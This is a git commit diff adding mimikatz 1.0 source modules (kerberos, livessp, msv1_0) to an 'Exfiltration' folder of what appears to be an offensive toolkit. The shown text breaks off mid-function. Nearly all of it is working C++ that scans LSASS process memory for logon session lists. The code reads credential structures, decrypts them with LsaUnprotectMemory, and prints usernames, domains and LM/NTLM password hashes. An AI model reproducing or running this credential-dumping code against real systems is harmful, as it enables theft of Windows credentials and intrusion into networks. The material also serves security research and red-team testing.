Adding Invoke-Mimikatz and Invoke-Ninjacopy

12 files changed, 1016 insertions, 0 deletions

diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp
new file mode 100644
index 0000000..dae52d2
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp
@@ -0,0 +1,135 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "kerberos.h"
+#include "..\..\global.h"
+mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_kerberos::pModKERBEROS = NULL;
+mod_mimikatz_sekurlsa_kerberos::PKIWI_KERBEROS_LOGON_SESSION mod_mimikatz_sekurlsa_kerberos::KerbLogonSessionList = NULL; //reinterpret_cast<mod_mimikatz_sekurlsa_kerberos::PKIWI_KERBEROS_LOGON_SESSION>(NULL);
+long mod_mimikatz_sekurlsa_kerberos::offsetMagic = 0;
+PRTL_AVL_TABLE mod_mimikatz_sekurlsa_kerberos::KerbGlobalLogonSessionTable = NULL; //reinterpret_cast<PRTL_AVL_TABLE>(NULL);
+
+bool mod_mimikatz_sekurlsa_kerberos::getKerberos(vector<wstring> * arguments)
+{
+	vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
+	monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getKerberosLogonData, wstring(L"kerberos")));
+	return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider);
+}
+
+bool mod_mimikatz_sekurlsa_kerberos::searchKerberosFuncs()
+{
+#ifdef _M_X64
+	BYTE PTRN_WALL_KerbUnloadLogonSessionTable[]= {0x48, 0x8b, 0x18, 0x48, 0x8d, 0x0d};
+	LONG OFFS_WALL_KerbUnloadLogonSessionTable	= sizeof(PTRN_WALL_KerbUnloadLogonSessionTable);
+
+	BYTE PTRN_WALL_KerbFreeLogonSessionList[]	= {0x48, 0x3b, 0xfe, 0x0f, 0x84};
+	LONG OFFS_WALL_KerbFreeLogonSessionList		= -4;
+#elif defined _M_IX86
+	BYTE PTRN_WNO8_KerbUnloadLogonSessionTable[]= {0x85, 0xc0, 0x74, 0x1f, 0x53};
+	LONG OFFS_WNO8_KerbUnloadLogonSessionTable	= -(3 + 4);
+	BYTE PTRN_WIN8_KerbUnloadLogonSessionTable[]= {0x85, 0xc0, 0x74, 0x2b, 0x57}; // 2c au lieu de 2b pour avant le RC
+	LONG OFFS_WIN8_KerbUnloadLogonSessionTable	= -(6 + 4);
+
+	BYTE PTRN_WALL_KerbFreeLogonSessionList[]	= {0xeb, 0x0f, 0x6a, 0x01, 0x57, 0x56, 0xe8};
+	LONG OFFS_WALL_KerbFreeLogonSessionList		= -4;
+#endif
+	if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModKERBEROS && !(KerbGlobalLogonSessionTable || KerbLogonSessionList))
+	{
+		PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0;
+
+		if(mod_system::GLOB_Version.dwMajorVersion < 6)
+		{
+			pointeur= reinterpret_cast<PBYTE *>(&KerbLogonSessionList);
+			pattern	= PTRN_WALL_KerbFreeLogonSessionList;
+			taille	= sizeof(PTRN_WALL_KerbFreeLogonSessionList);
+			offset	= OFFS_WALL_KerbFreeLogonSessionList;
+
+			if(mod_system::GLOB_Version.dwMinorVersion < 2)
+				offsetMagic = 8;
+		}
+		else
+		{
+			pointeur= reinterpret_cast<PBYTE *>(&KerbGlobalLogonSessionTable);
+
+#ifdef _M_X64
+			pattern	= PTRN_WALL_KerbUnloadLogonSessionTable;
+			taille	= sizeof(PTRN_WALL_KerbUnloadLogonSessionTable);
+			offset	= OFFS_WALL_KerbUnloadLogonSessionTable;
+#elif defined _M_IX86
+			if(mod_system::GLOB_Version.dwBuildNumber < 8000)
+			{
+				pattern	= PTRN_WNO8_KerbUnloadLogonSessionTable;
+				taille	= sizeof(PTRN_WNO8_KerbUnloadLogonSessionTable);
+				offset	= OFFS_WNO8_KerbUnloadLogonSessionTable;
+			}
+			else
+			{
+				if(mod_system::GLOB_Version.dwBuildNumber < 8400) // petite correction pour avant la RC
+					PTRN_WIN8_KerbUnloadLogonSessionTable[3] = 0x2c;
+				pattern	= PTRN_WIN8_KerbUnloadLogonSessionTable;
+				taille	= sizeof(PTRN_WIN8_KerbUnloadLogonSessionTable);
+				offset	= OFFS_WIN8_KerbUnloadLogonSessionTable;
+			}
+#endif
+		}
+
+		if(HMODULE monModule = LoadLibrary(L"kerberos"))
+		{
+			MODULEINFO mesInfos;
+			if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO)))
+			{
+				mod_memory::genericPatternSearch(pointeur, L"kerberos", pattern, taille, offset);
+				*pointeur += pModKERBEROS->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
+			}
+			FreeLibrary(monModule);
+		}
+	}
+	return (pModKERBEROS && (KerbGlobalLogonSessionTable || KerbLogonSessionList));
+}
+
+bool WINAPI mod_mimikatz_sekurlsa_kerberos::getKerberosLogonData(__in PLUID logId, __in bool justSecurity)
+{
+	if(searchKerberosFuncs())
+	{
+		PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL;
+		DWORD taille;
+		BYTE * monBuff = NULL;
+		
+		if(KerbGlobalLogonSessionTable)
+		{
+			taille = sizeof(KIWI_KERBEROS_PRIMARY_CREDENTIAL);
+			monBuff = new BYTE[taille];
+			
+			if(PKIWI_KERBEROS_PRIMARY_CREDENTIAL pLogSession = reinterpret_cast<PKIWI_KERBEROS_PRIMARY_CREDENTIAL>(mod_mimikatz_sekurlsa::getPtrFromAVLByLuid(KerbGlobalLogonSessionTable, FIELD_OFFSET(KIWI_KERBEROS_PRIMARY_CREDENTIAL, LocallyUniqueIdentifier), logId)))
+			{
+				if(mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS))
+				{
+					pLogSession = reinterpret_cast<PKIWI_KERBEROS_PRIMARY_CREDENTIAL>(monBuff);
+					mesCreds =  &pLogSession->credentials;
+				}
+			}
+		}
+		else
+		{
+			taille = sizeof(KIWI_KERBEROS_LOGON_SESSION) + offsetMagic;
+			monBuff = new BYTE[taille];
+			if(PKIWI_KERBEROS_LOGON_SESSION pLogSession = reinterpret_cast<PKIWI_KERBEROS_LOGON_SESSION>(mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(KerbLogonSessionList), FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier) + offsetMagic, logId)))
+			{
+				if(mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS))
+				{
+					pLogSession = reinterpret_cast<PKIWI_KERBEROS_LOGON_SESSION>(monBuff);
+					if(offsetMagic != 0)
+						pLogSession = reinterpret_cast<PKIWI_KERBEROS_LOGON_SESSION>(reinterpret_cast<PBYTE>(pLogSession) + offsetMagic);
+					mesCreds =  &pLogSession->credentials;
+				}
+			}
+		}
+		mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity);
+		delete [] monBuff;
+	}
+	else (*outputStream) << L"n.a. (kerberos KO)";
+
+	return true;
+}
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h
new file mode 100644
index 0000000..1418d4f
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h
@@ -0,0 +1,70 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "../mod_mimikatz_sekurlsa.h"
+
+class mod_mimikatz_sekurlsa_kerberos {
+
+private:
+	typedef struct _KIWI_KERBEROS_LOGON_SESSION
+	{
+		struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
+		struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
+		DWORD	UsageCount;
+		PVOID	unk0;
+		PVOID	unk1;
+		PVOID	unk2;
+		DWORD	unk3;
+		DWORD	unk4;
+		PVOID	unk5;
+		PVOID	unk6;
+		PVOID	unk7;
+		LUID LocallyUniqueIdentifier;
+	#ifdef _M_IX86
+		DWORD	unk8;
+	#endif
+		DWORD	unk9;
+		DWORD	unk10;
+		PVOID	unk11;
+		DWORD	unk12;
+		DWORD	unk13;
+		PVOID	unk14;
+		PVOID	unk15;
+		PVOID	unk16;
+		KIWI_GENERIC_PRIMARY_CREDENTIAL	credentials;
+	} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
+
+	typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
+	{
+		DWORD unk0;
+		PVOID unk1;
+		PVOID unk2;
+		PVOID unk3;
+	#ifdef _M_X64
+		BYTE unk4[32];
+	#elif defined _M_IX86
+		BYTE unk4[20];
+	#endif
+		LUID LocallyUniqueIdentifier;
+	#ifdef _M_X64
+		BYTE unk5[44];
+	#elif defined _M_IX86
+		BYTE unk5[36];
+	#endif
+		KIWI_GENERIC_PRIMARY_CREDENTIAL	credentials;
+	} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
+
+	static PKIWI_KERBEROS_LOGON_SESSION KerbLogonSessionList;
+	static long offsetMagic;
+	static PRTL_AVL_TABLE KerbGlobalLogonSessionTable;
+	static bool searchKerberosFuncs();
+
+public:
+	static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModKERBEROS;
+	static bool getKerberos(vector<wstring> * arguments);
+	static bool WINAPI getKerberosLogonData(__in PLUID logId, __in bool justSecurity);
+};
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp
new file mode 100644
index 0000000..7f64678
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp
@@ -0,0 +1,70 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "livessp.h"
+#include "..\..\global.h"
+mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_livessp::pModLIVESSP = NULL;
+mod_mimikatz_sekurlsa_livessp::PKIWI_LIVESSP_LIST_ENTRY mod_mimikatz_sekurlsa_livessp::LiveGlobalLogonSessionList = NULL;//reinterpret_cast<mod_mimikatz_sekurlsa_livessp::PKIWI_LIVESSP_LIST_ENTRY>(NULL);
+
+bool mod_mimikatz_sekurlsa_livessp::getLiveSSP(vector<wstring> * arguments)
+{
+	vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
+	monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getLiveSSPLogonData, wstring(L"livessp")));
+	return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider);
+}
+
+bool mod_mimikatz_sekurlsa_livessp::searchLiveGlobalLogonSessionList()
+{
+#ifdef _M_X64
+	BYTE PTRN_WALL_LiveUpdatePasswordForLogonSessions[]	= {0x48, 0x83, 0x65, 0xdf, 0x00, 0x48, 0x83, 0x65, 0xef, 0x00, 0x48, 0x83, 0x65, 0xe7, 0x00};
+#elif defined _M_IX86
+	BYTE PTRN_WALL_LiveUpdatePasswordForLogonSessions[]	= {0x89, 0x5d, 0xdc, 0x89, 0x5d, 0xe4, 0x89, 0x5d, 0xe0};
+#endif
+	LONG OFFS_WALL_LiveUpdatePasswordForLogonSessions	= -(5 + 4);
+
+	if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModLIVESSP && !LiveGlobalLogonSessionList)
+	{
+	
+		PBYTE *pointeur = reinterpret_cast<PBYTE *>(&LiveGlobalLogonSessionList);
+		if(HMODULE monModule = LoadLibrary(L"livessp"))
+		{
+			MODULEINFO mesInfos;
+			if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO)))
+			{
+				mod_memory::genericPatternSearch(pointeur, L"livessp", PTRN_WALL_LiveUpdatePasswordForLogonSessions, sizeof(PTRN_WALL_LiveUpdatePasswordForLogonSessions), OFFS_WALL_LiveUpdatePasswordForLogonSessions);
+				*pointeur += pModLIVESSP->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
+			}
+			FreeLibrary(monModule);
+		}
+	}
+	return (pModLIVESSP && LiveGlobalLogonSessionList);
+}
+
+bool WINAPI mod_mimikatz_sekurlsa_livessp::getLiveSSPLogonData(__in PLUID logId, __in bool justSecurity)
+{
+	if(searchLiveGlobalLogonSessionList())
+	{
+		PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL;
+		BYTE * monBuffP = new BYTE[sizeof(KIWI_LIVESSP_LIST_ENTRY)], * monBuffC = new BYTE[sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL)];
+		if(PKIWI_LIVESSP_LIST_ENTRY pLogSession = reinterpret_cast<PKIWI_LIVESSP_LIST_ENTRY>(mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(LiveGlobalLogonSessionList), FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), logId)))
+		{
+			if(mod_memory::readMemory(pLogSession, monBuffP, sizeof(KIWI_LIVESSP_LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS))
+			{
+				pLogSession = reinterpret_cast<PKIWI_LIVESSP_LIST_ENTRY>(monBuffP);
+				if(pLogSession->suppCreds)
+				{
+					if(mod_memory::readMemory(pLogSession->suppCreds, monBuffC, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS))
+						mesCreds = &(reinterpret_cast<PKIWI_LIVESSP_PRIMARY_CREDENTIAL>(monBuffC)->credentials);
+				}
+				else (*outputStream) << L"n.s. (SuppCred KO) / ";
+			}
+		}
+		mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity, true);
+		delete [] monBuffC, monBuffP;
+	}
+	else (*outputStream) << L"n.a. (livessp KO)";
+	return true;
+}
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h
new file mode 100644
index 0000000..891da63
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h
@@ -0,0 +1,44 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "../mod_mimikatz_sekurlsa.h"
+
+class mod_mimikatz_sekurlsa_livessp {
+
+private:
+	typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL
+	{
+		DWORD isSupp;	// 88h
+		DWORD unk0;
+		KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
+	} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
+
+	typedef struct _KIWI_LIVESSP_LIST_ENTRY
+	{
+		struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
+		struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
+		PVOID	unk0;	// 1
+		PVOID	unk1;	// 0FFFFFFFFh
+		PVOID	unk2;	// 0FFFFFFFFh
+		PVOID	unk3;	// 0
+		DWORD	unk4;	// 0
+		DWORD	unk5;	// 0
+		PVOID	unk6;	// 20007D0h
+		LUID	LocallyUniqueIdentifier;
+		LSA_UNICODE_STRING UserName;
+		PVOID	unk7;	// 2000010Dh
+		PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
+	} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
+
+	static PKIWI_LIVESSP_LIST_ENTRY LiveGlobalLogonSessionList;
+	static bool searchLiveGlobalLogonSessionList();
+
+public:
+	static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModLIVESSP;
+	static bool getLiveSSP(vector<wstring> * arguments);
+	static bool WINAPI getLiveSSPLogonData(__in PLUID logId, __in bool justSecurity);
+};
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp
new file mode 100644
index 0000000..39fa015
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp
@@ -0,0 +1,217 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "msv1_0.h"
+#include "..\..\global.h"
+PLIST_ENTRY mod_mimikatz_sekurlsa_msv1_0::LogonSessionList = NULL;
+PULONG mod_mimikatz_sekurlsa_msv1_0::LogonSessionListCount = NULL;
+
+bool mod_mimikatz_sekurlsa_msv1_0::getMSV(vector<wstring> * arguments)
+{
+	vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
+	monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getMSVLogonData, wstring(L"msv1_0")));
+	return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider);
+}
+
+bool mod_mimikatz_sekurlsa_msv1_0::searchLogonSessionList()
+{
+#ifdef _M_X64
+	BYTE PTRN_WIN6_LogonSessionList[]		= {0x4C, 0x03, 0xD8, 0x49, 0x8B, 0x03, 0x48, 0x89};//, 0x06, 0x4C, 0x89, 0x5E};
+	BYTE PTRN_WIN5_LogonSessionList[]		= {0x4C, 0x8B, 0xDF, 0x49, 0xC1, 0xE3, 0x04, 0x48, 0x8B, 0xCB, 0x4C, 0x03, 0xD8};
+	
+	LONG OFFS_WALL_LogonSessionList			= -sizeof(long);
+	LONG OFFS_WN60_LogonSessionListCount	= OFFS_WALL_LogonSessionList - (3 + 4 + 3 + 6 + 3 + 2 + 8 + 7 + 4 + 4 + 2 + 3 + 3 + sizeof(long));
+	LONG OFFS_WN61_LogonSessionListCount	= OFFS_WALL_LogonSessionList - (3 + 4 + 3 + 6 + 3 + 2 + 8 + 7 + 4 + 4 + 2 + 3 + 2 + sizeof(long));
+	LONG OFFS_WIN5_LogonSessionListCount	= OFFS_WALL_LogonSessionList - (3 + 6 + 3 + 8 + 4 + 4 + 2 + 3 + 2 + 2 + sizeof(long));
+	LONG OFFS_WIN8_LogonSessionListCount	= OFFS_WALL_LogonSessionList - (3 + 4 + 3 + 6 + 3 + 2 + 3 + 7 + 7 + 4 + 4 + 2 + 3 + 2 + sizeof(long));
+#elif defined _M_IX86
+	BYTE PTRN_WNO8_LogonSessionList[]		= {0x89, 0x71, 0x04, 0x89, 0x30, 0x8D, 0x04, 0xBD};
+	BYTE PTRN_WIN8_LogonSessionList[]		= {0x89, 0x79, 0x04, 0x89, 0x38, 0x8D, 0x04, 0xB5};
+	BYTE PTRN_WN51_LogonSessionList[]		= {0xFF, 0x50, 0x10, 0x85, 0xC0, 0x0F, 0x84};
+
+	LONG OFFS_WNO8_LogonSessionList			= -(7 + (sizeof(LONG)));
+	LONG OFFS_WIN8_LogonSessionList			= -(6 + 3 + 3 + 2 + 2 + (sizeof(LONG)));
+	LONG OFFS_WN51_LogonSessionList			= sizeof(PTRN_WN51_LogonSessionList) + 4 + 5 + 1 + 6 + 1;
+	LONG OFFS_WNO8_LogonSessionListCount	= OFFS_WNO8_LogonSessionList - (3 + 6 + 1 + 2 + 6 + 3 + 2 + 3 + 1 + sizeof(long));
+	LONG OFFS_WIN5_LogonSessionListCount	= OFFS_WNO8_LogonSessionList - (3 + 6 + 1 + 2 + 6 + 3 + 2 + 1 + 3 + 1 + sizeof(long));
+	LONG OFFS_WIN8_LogonSessionListCount	= OFFS_WIN8_LogonSessionList - (3 + 6 + 1 + 2 + 6 + 3 + 2 + 3 + 1 + sizeof(long));
+#endif
+	if(mod_mimikatz_sekurlsa::searchLSASSDatas() && mod_mimikatz_sekurlsa::hLsaSrv && mod_mimikatz_sekurlsa::pModLSASRV && !LogonSessionList)
+	{
+		PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offsetListe = 0, offsetCount = 0;
+#ifdef _M_X64
+		offsetListe	= OFFS_WALL_LogonSessionList;
+		if(mod_system::GLOB_Version.dwMajorVersion < 6)
+		{
+			pattern	= PTRN_WIN5_LogonSessionList;
+			taille	= sizeof(PTRN_WIN5_LogonSessionList);
+			offsetCount = OFFS_WIN5_LogonSessionListCount;
+		}
+		else
+		{
+			pattern	= PTRN_WIN6_LogonSessionList;
+			taille	= sizeof(PTRN_WIN6_LogonSessionList);
+			if(mod_system::GLOB_Version.dwBuildNumber < 8000)
+				offsetCount = (mod_system::GLOB_Version.dwMinorVersion < 1) ? OFFS_WN60_LogonSessionListCount : OFFS_WN61_LogonSessionListCount;
+			else
+				offsetCount = OFFS_WIN8_LogonSessionListCount;
+		}
+#elif defined _M_IX86
+		if(mod_system::GLOB_Version.dwBuildNumber < 8000)
+		{
+			if((mod_system::GLOB_Version.dwMajorVersion == 5) && (mod_system::GLOB_Version.dwMinorVersion == 1))
+			{
+				pattern	= PTRN_WN51_LogonSessionList;
+				taille	= sizeof(PTRN_WN51_LogonSessionList);
+				offsetListe	= OFFS_WN51_LogonSessionList;
+			}
+			else
+			{
+				pattern	= PTRN_WNO8_LogonSessionList;
+				taille	= sizeof(PTRN_WNO8_LogonSessionList);
+				offsetListe	= OFFS_WNO8_LogonSessionList;
+				offsetCount = (mod_system::GLOB_Version.dwMajorVersion < 6) ? OFFS_WIN5_LogonSessionListCount : OFFS_WNO8_LogonSessionListCount;
+			}
+		}
+		else
+		{
+			pattern	= PTRN_WIN8_LogonSessionList;
+			taille	= sizeof(PTRN_WIN8_LogonSessionList);
+			offsetListe	= OFFS_WIN8_LogonSessionList;
+			offsetCount = OFFS_WIN8_LogonSessionListCount;
+		}
+#endif
+		MODULEINFO mesInfos;
+		if(GetModuleInformation(GetCurrentProcess(), mod_mimikatz_sekurlsa::hLsaSrv, &mesInfos, sizeof(MODULEINFO)))
+		{
+			pointeur = reinterpret_cast<PBYTE *>(&LogonSessionList);
+			if(mod_memory::genericPatternSearch(pointeur, L"lsasrv", pattern, taille, offsetListe))
+			{
+				*pointeur += mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
+				if(offsetCount)
+				{
+					pointeur = reinterpret_cast<PBYTE *>(&LogonSessionListCount);
+					if(mod_memory::genericPatternSearch(pointeur, L"lsasrv", pattern, taille, offsetCount))
+						*pointeur += mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
+				}
+			}
+		}
+	}
+	return (mod_mimikatz_sekurlsa::hLsaSrv && mod_mimikatz_sekurlsa::pModLSASRV && LogonSessionList && (((mod_system::GLOB_Version.dwMajorVersion == 5) && (mod_system::GLOB_Version.dwMinorVersion == 1)) || LogonSessionListCount));
+}
+
+bool WINAPI mod_mimikatz_sekurlsa_msv1_0::getMSVLogonData(__in PLUID logId, __in bool justSecurity)
+{
+	if(searchLogonSessionList())
+	{
+		LONG offsetToLuid, offsetToCredentials;
+		if(mod_system::GLOB_Version.dwMajorVersion < 6)
+		{
+			offsetToLuid = FIELD_OFFSET(KIWI_MSV1_0_LIST_5, LocallyUniqueIdentifier);
+			offsetToCredentials = FIELD_OFFSET(KIWI_MSV1_0_LIST_5, Credentials);
+		}
+		else
+		{
+			offsetToLuid = FIELD_OFFSET(KIWI_MSV1_0_LIST_6, LocallyUniqueIdentifier);
+			offsetToCredentials = FIELD_OFFSET(KIWI_MSV1_0_LIST_6, Credentials);
+			if(mod_system::GLOB_Version.dwBuildNumber >= 8000)	 // pas encore pris le temps de regarder les structures de 8
+			{
+#ifdef _M_X64
+				offsetToCredentials += 4*sizeof(PVOID);
+#elif defined _M_IX86
+				offsetToCredentials += 2*sizeof(PVOID);
+#endif
+			}
+		}
+		
+		ULONG nbListes = 0;
+		if(LogonSessionListCount)
+			mod_memory::readMemory(LogonSessionListCount, &nbListes, sizeof(nbListes), mod_mimikatz_sekurlsa::hLSASS);
+		else nbListes = 1;
+
+		PLIST_ENTRY pLogSession = NULL;
+		for(ULONG i = 0; i < nbListes; i++)
+		{
+			if(pLogSession = mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(LogonSessionList + i), offsetToLuid, logId))
+			{
+				BYTE * kiwiMSVListEntry = new BYTE[offsetToCredentials + sizeof(PVOID)];
+				if(mod_memory::readMemory(pLogSession, kiwiMSVListEntry, offsetToCredentials + sizeof(PVOID), mod_mimikatz_sekurlsa::hLSASS))
+				{
+					PVOID monPtr = *reinterpret_cast<PVOID *>(kiwiMSVListEntry + offsetToCredentials);
+					if(monPtr)
+					{
+						BYTE * kiwiMSVCredentials = new BYTE[sizeof(KIWI_MSV1_0_CREDENTIALS)];
+						if(mod_memory::readMemory(monPtr, kiwiMSVCredentials, sizeof(KIWI_MSV1_0_CREDENTIALS), mod_mimikatz_sekurlsa::hLSASS))
+						{
+							PKIWI_MSV1_0_CREDENTIALS mesCreds = reinterpret_cast<PKIWI_MSV1_0_CREDENTIALS>(kiwiMSVCredentials);
+							if(mesCreds->PrimaryCredentials)
+							{
+								BYTE * kiwiMSVPrimaryCredentials = new BYTE[sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)];
+								if(mod_memory::readMemory(mesCreds->PrimaryCredentials, kiwiMSVPrimaryCredentials, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS), mod_mimikatz_sekurlsa::hLSASS))
+								{
+									decryptAndDisplayCredsBlock(&reinterpret_cast<PKIWI_MSV1_0_PRIMARY_CREDENTIALS>(kiwiMSVPrimaryCredentials)->Credentials, justSecurity);
+								} else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)";
+								delete [] kiwiMSVPrimaryCredentials;
+
+							} else (*outputStream) << L"n.s. (PrimaryCredentials KO)";
+
+						}else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)";
+						delete [] kiwiMSVCredentials;
+
+					} else (*outputStream) << L"n.s. (Credentials KO)";
+
+				} else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_LIST KO)";
+				delete [] kiwiMSVListEntry;
+
+				break;
+			}
+		}
+		if(!pLogSession)
+			(*outputStream) << L"n.t. (LUID KO)";
+	}
+	else (*outputStream) << L"n.a. (msv1_0 KO)";
+	return true;
+}
+
+bool mod_mimikatz_sekurlsa_msv1_0::decryptAndDisplayCredsBlock(LSA_UNICODE_STRING * monBlock, bool justSecurity)
+{
+	if(monBlock->Length > 0 && monBlock->MaximumLength > 0 && monBlock->Buffer)
+	{
+		BYTE * monBuffer = new BYTE[monBlock->MaximumLength];
+		if(mod_memory::readMemory(monBlock->Buffer, monBuffer, monBlock->MaximumLength, mod_mimikatz_sekurlsa::hLSASS))
+		{
+			mod_mimikatz_sekurlsa::SeckPkgFunctionTable->LsaUnprotectMemory(monBuffer, monBlock->Length);
+			PMSV1_0_PRIMARY_CREDENTIAL mesCreds = reinterpret_cast<PMSV1_0_PRIMARY_CREDENTIAL>(monBuffer);
+			
+			NlpMakeRelativeOrAbsoluteString(mesCreds, &mesCreds->UserName, false);
+			NlpMakeRelativeOrAbsoluteString(mesCreds, &mesCreds->LogonDomainName, false);
+
+			wstring lmHash = mod_text::stringOfHex(mesCreds->LmOwfPassword, sizeof(mesCreds->LmOwfPassword));
+			wstring ntHash = mod_text::stringOfHex(mesCreds->NtOwfPassword, sizeof(mesCreds->NtOwfPassword));
+
+			if(justSecurity)
+				(*outputStream) << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }";
+			else
+			{
+				(*outputStream) << endl <<
+					L"\t * Utilisateur  : " << mod_text::stringOfSTRING(mesCreds->UserName) << endl <<
+					L"\t * Domaine      : " << mod_text::stringOfSTRING(mesCreds->LogonDomainName) << endl <<
+					L"\t * Hash LM      : " << lmHash << endl <<
+					L"\t * Hash NTLM    : " << ntHash;
+			}
+		} else (*outputStream) << L"n.e. (Lecture Block Credentials KO)";
+
+		delete [] monBuffer;
+	} else (*outputStream) << L"n.s. (Block Credentials KO)";
+
+	return true;
+}
+
+void mod_mimikatz_sekurlsa_msv1_0::NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative)
+{
+	if(String->Buffer)
